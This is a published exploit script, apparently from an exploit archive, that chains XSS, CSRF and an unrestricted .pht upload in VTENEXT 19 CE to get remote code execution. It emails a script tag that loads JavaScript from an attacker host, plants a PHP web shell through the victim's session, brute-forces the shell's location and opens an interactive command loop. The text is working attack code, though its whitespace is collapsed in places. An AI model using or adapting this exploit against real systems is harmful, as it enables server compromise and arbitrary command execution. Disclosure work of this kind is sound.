#!/usr/bin/python3# Exploit Title: VTENEXT 19 CE - Remote Code Execution# Google Dork: n/a# Date: 2020/09/09# Exploit Author: Marco Ruela# Vendor Homepage: https://www.vtenext.com/en/# Software Link: Vendor removed vulnerable version from sourceforge.net# Version: 19 CE# Tested on: Ubuntu 16.04# CVE : N/A# 2020/03/07 - Disclosed vulnerabilities to vendor# 2020/03/10 - Vendor committed to fix# 2020/09/09 - Public disclosure# This script should be easy enough to follow.# We string together the three vulnerabilities to get RCE.# XSS - The "From" field of the VTENEXT Messages module is vulnerable.# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default .# CSRF - No CSRF protections in place.# exploit.js needs to be hosted somewhere, IP's need to be replaced # check_csrf() should be changed based on your setup# run_shell() is a "nice to have"# content of exploit.js"""
function insertImage() {
var xhr = new XMLHttpRequest();
xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
xhr.setRequestHeader('Content-Length', '248');
xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
xhr.withCredentials = true;
var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
insertImage();
"""import smtplib
import datetime
import requests
import os
import time
base_url ="http://192.168.226.168/vtenext19ce/"print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")defbuild_url():
d = datetime.datetime.today()
year =str(d.year)
month =str(d.strftime("%B"))
week ="week"+str(d.isocalendar()[1]- d.replace(day=1).isocalendar()[1])
tmp = base_url +"storage/home/1/"+ year +"/"+ month +"/"+ week +"/"return(tmp)defbuild_mail():
_from ="""'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
_to ="admin@example.com"
_subject ="Important!"
_body ="While you're reading this, a file is being uploaded to this server."
msg ="From: "+ _from +"\n"
msg +="To: "+ _to +"\n"
msg +="Subject: "+ _subject +"\n\n"
msg += _body
return msg
defsend_mail():
msg = build_mail()
smtp_server ='192.168.226.167'
smtp_port =25
sender ='user1@lab.local'
receiver ='admin@lab.local'
server = smtplib.SMTP(smtp_server, smtp_port)
server.sendmail(sender, receiver, msg)defcheck_csrf():whileTrue:
is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()if"200"in is_there and"/exploit.js"in is_there and base_url in is_there:print("[>] CSRF triggered")breakelse:
time.sleep(0.5)continuedeffind_shell():print("[>] Locating shell")
time.sleep(1)
tmp1 = build_url()for i inrange(1,9999):
url = tmp1 +str(i)+"_shell.pht"
r = requests.get(url)if r.status_code ==200:print("[>] Found the shell")print("[-] Location: "+ url)return url
else:continuedefrun_shell(x):print("\n")whileTrue:
cmd =input("shell> ")if cmd =="exit":breakelse:
url = x +"?x="+ cmd
r = requests.get(url)print(r.text)print("[>] Sending email")
send_mail()print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)print("[!] Done!")
